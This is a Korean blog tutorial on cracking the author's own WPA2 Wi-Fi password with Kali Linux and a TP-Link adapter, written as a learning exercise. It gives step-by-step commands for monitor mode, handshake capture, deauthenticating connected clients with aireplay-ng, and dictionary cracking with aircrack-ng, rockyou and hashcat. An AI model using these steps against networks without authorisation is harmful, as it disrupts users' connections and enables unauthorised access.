ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • 와이파이 해킹 TP_Link TL_WN722N
    해킹, 보안 2021. 2. 13. 19:49
    반응형

    필자는 자기자신의 wifi의 패스워드를 알아본것이다.

    남의 wifi에 대해서 하는 행동은 절대로 하지 말도록하자

    필자는 실습해보려고한것이다.

     

    준비물 TP_LINK TL_WN722N, 칼리= 2020.04(필자가 사용하는 칼리 버전)
    칼리에 tp_link를 꽂고 기다린다. 불이 들어오면,

    iwconfig 명령어로 확인한다.

    보게되면 ModeManaged 모드로 되어있다.

    우리는 Monitor 모드로 변경하여 패킷을 받을것이다.

    Monitor 모드: 주변에 뿌려진 모든 패킷을 받는것이다.

     

    필자는 일반적인 방법으로는 변경이 안되서 아래방법(드라이브 설치)을 사용했다.

    만약 airmon-ng check kill, airmon-ng start wlan0이 되서 monitor 모드로 변경이 된다면 아래로 계속 내려라.

    sudo apt install bc

    https://github.com/AIRCRACK-NG/RTL8188EUS여기서 실행에 필요한 파일을 다운받는다.

    sudo -i로 대상 사용자(kali) 로 로그인 쉘을 실행하자

    echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf" 파일을 생성해준뒤,

    exit로 나가자.

    make && make install(컴파일)을 해주는데 만약 이렇게 에러가 뜬다면,

     

    make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/5.9.0-kali5-amd64/build M=/home/kali/rtl8188eus modules

    make[1]: *** /lib/modules/5.9.0-kali5-amd64/build: No such file or directoy. stop.

    make: *** [Makefile: 2059 : modules] Error 2

     

    리눅스 헤더를 설치해야되는것이므로

    apt-get install build-essential linux-headers-$(uname -r) 해서 해당 리눅스 배포버전에 맞는 헤더를 깔도록 하자

    만약 이렇게 오류가 난다면

     

    E: Unable to locate package linux-headers-5.9.0-kali5-amd64

    E: Couldn't find any package by glob 'linux-headers-5.9.0-kali5-amd64'

    E: Couldn't find any package by regex 'linux-headers-5.9.0-kali5-amd64'

     

    source.list에 (/etc/apt/source.list)

    deb http://security.kali.org/kali-security kali/updates main contrib non-free

    deb http://http.kali.org/kali kali main contrib non-free

    가 있는지 확인해보자

    apt-get update

    apt-get dist-upgrade

    apt -f install (손상된 패키지 수정)

    apt install linux-headers-$(uname -r)

    이걸해본뒤에도 또 저렇게 뜬다면

     

    apt-cache search linux-headers 를 쳐서 버전을 확인한뒤,

     

    해당버전이 있는지 확인하고 있으면 설치한다.

    만약 없다면 따로 인터넷으로 검색해서 다운받아야된다.

    http://kali.download/kali/pool/main/l/linux/ 여기서 찾도록 하자

    여기서 다운받고 칼리 안으로 프로그램을 넣어준뒤 그 프로그램이 있는 폴더로 가서

    dpkg -i (다운받은 리눅스 헤더 파일) <-- 해당 파일 설치 및 최신버전으로 업그레이드

    그다음 다시 apt install linux-headers-$(uname -r) 이 명령어를 입력해서 다운이 되었는지 확인하자

    다시 돌아와서 make를 해보자

    오류가 달라졌다.

     

    makefile:1: /usr/src/linux-headers-5.9.0-kali5-common/Makefile: No suck file or directory

    make[1]: *** No rule to make target '/usr/src/linux-headers-5.9.0-kali5-common/Makefile'. Stop.

    make[1]: Leaving directory '/usr/src/linux-headers-5.9.0-kali5-amd64'

    make: *** [Makefile:2059: modules] Error2

     

    common/makefile이 없다니깐 다시 위에 사이트(http://kali.download/kali/pool/main/l/linux/)에 가서

    linux-headers-5.9.0-kali5-common 을 다운받고 dpkg로 설치해주자

    다시 make를 해주자

    성공적으로 되고있다.

     

    Make install

    그다음 modprobe로 모듈을 커널에 추가하자

     

    이제 다시 돌아와서


    위에서 된다면 여기서부터 시작하면된다.!!!


    airmon-ng check kill 이 명령어는 Monitor 모드로 변경시 간섭 발생 확률이 있는 프로세스들 을 종료시켜주는 명령어이다.

    그다음 변경됬는지 확인해보자

    됬다!!!!

     

    이제 airodump-ng wlan0으로 주변 wifi를 스캔하도록 하자

     

    여기서 뚫고 싶은 와이파이의 채널(CH), 와이파이 이름(ESSID), AP장비의 맥주소 (BSSID)을 메모한뒤

     

    airodump-ng -c (채널) --bssid (맥주소) -w (저장할 파일 이름) wlan0(장치이름)

    해당 와이파이에 연결된 기기들을 순간적으로 연결-해제 해서 재인증을 하도록 하는 명령어이다.

    이렇게 하면 위에

     

    여기서 fixed channel wlan0

    handshake로 바뀔것이다.

    엄청 오래 기다려야되는데 기다리기 귀찮다면,

    aireplay-ng -0 숫자(전송할 패킷수 이 숫자가 높으면 걸릴확률이 높아진다 2이하로 하자) -a 맥주소(와이파이) -c 맥주소(와이파이에 연결된 장치의 mac주소 위에 가린부분에 station 부분이다.) wlan0(장치이름)

    이 명령어는 강제적으로 wifi에 연결된 장치의 wifi를 끊고 다시 연결해서 사용자가 다시 연결하도록 하는것이다. 사용자가 다시 로그인하게 된다면 4-way handshake가 발생된다.

    그럼 금방 handshake로 바뀔것이다.

    자 이제 파일들을 확인해보자

    암호를 푸는 방법은 몇가지가 있다.

    GPU기반이 아니라면 아래방법을 실행하면 된다.

     

    일단 패스워드 사전파일을 다운받아야된다.

    패스워드 사전파일이란? 암호를 풀기위한 파일, 즉 무작위로 대입해본다는것이다.

    당연히 좋은 파일이 있을수록 암호가 복잡하더라도 잘 풀수 있다.

     

    칼리에는 기본적으로 rock you라는 파일이 있는데 쓸만하다. 이걸써보도록 하자

     

    만약 rock you/usr/share/wordlists에 없다면

    curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt 명령어를 쳐서 다운받도록 하자, 현재 디렉토리에 다운받아질것이다.

    (curl은 웹 요청 명령어이다.) (옵션 L은 서버에 301,302응답이 왔을경우 redirection URL으로 따라가라는 뜻이다.)

    rock you의 위치는

    여기이다. 현재 디렉토리로 불러서 압축을 풀어주도록 하자

    gzip -d(decompress) rouckyou.txt.gz

    ls 명령어로 확인하자

    이제 한번 뚫어보자

    aircrack-ng -a2(만약 WPA2가 아닌 WPA이면 -a옵션을 주자) -b 맥주소(와이파이의 맥주소) -w rockyou.txt(사전파일) Mr-01.cap(cap파일)

    이 명령어를 치고 기다리면


    암호를 풀었다!


    자 이제 다른방식으로 풀어보자

     

    hashcat으로 암호를 풀것이다. 이 툴은 각종 암호들을 풀수있는 툴이다.

    hashcat-utils을 다운받자.

    필자는 오류가 떳는데, 아마 칼리 헤더랑 충돌이 난것같다.

    apt --fix-broken install을 해달라고하니 해주자

    이제 다시 한번 다운을 해보자

     

    cap 파일을 hccapx 형식으로 바꿀것이다. 왜냐하면 hashcatcap파일을 인식하지 못하기 때문이다.

    cap2hccapx.bin으로 바꿔줄것이다.

     

    https://hashcat.net/cap2hccapx/

    간단하게 이 사이트에 들어가서 바꿔도 되지만 칼리에서 바꾸는 실습을 해볼것이다.

    만약 여기서 안바꿔진다면 아래내용을 하면 된다.

     

    git clone https://github.com/hashcat/hashcat-utils.git

    명령어로 다운받도록 하자.

     

    그럼 hashcat-utils 가 생성이 될텐데

    hashcat-utils안의 src폴더로 들어가서

    make 명령어를 쳐주자

     

    그뒤, ls를 쳐보면 cap2hccapx.bin파일이 생성될텐데,

    이걸 / 밑에 bin 폴더로 옮겨주자 <--어디에서나 명령어를 사용할수 있게 하기위해서

    그뒤, 재시작을 하자

    그다음 cap2hccapx.bin Mr-01.cap(cap파일) Mr-01.hccapx(변경파일)

    hccapx파일로 변경해준뒤에

     

    haschcat 을 실행하자 --help명령어로 뭐가 뭔지 확인할수있다.

    -m 은 크랙하려는 해시가 어떤것인지 지정하는것이다.

    우리는 WAP를 해시할것이니깐 2500

    -a attack modes이다. 어떤방식으로 공격할것인가?

    무작위 대입을 하도록 하자

    -o는 저장 파일명이다. Mrpassword로 저장할것이다.

    마지막은 파일을 불러오자.

     

    좀 기다리면

    이렇게 뜬다.

    예상시간이 70년 하고도 319일 걸린다고한다. ㅎㄷㄷ;;;

    따로 사전파일이 없으면 그냥 도전하지 말자....

     

     

     

    추가적으로 와이파이 암호방식에 대해 설명하자면

    와이파이의 암호화 방식은 2가지 있는데

    WEP방식과 WPA2 방식 두개가 있다.

    WEP은 그냥 뚫리니깐 사용하지 말자

    WPA방식은 암호화 버전에 따라 1하고 2가 있는데

    1TKIP 라는 방식이다.

    IEEE 802.11i를 표준으로 하고 동적으로 키값이 변경된다.

    2AES 데이터 암호화 기능이 추가된다.

     

    반응형

    '해킹, 보안' 카테고리의 다른 글

    칼리로 윈도우 비밀번호 바꾸기  (0) 2021.03.28
    cuckoo, sandbox 설치  (0) 2021.02.13
    openvas 설치  (0) 2021.01.22
    MITM 공격(중간자 공격) 카인과 아벨 편  (0) 2021.01.13
    MITM 공격(중간자 공격) ettercap편  (0) 2021.01.13

    댓글

Designed by Tistory.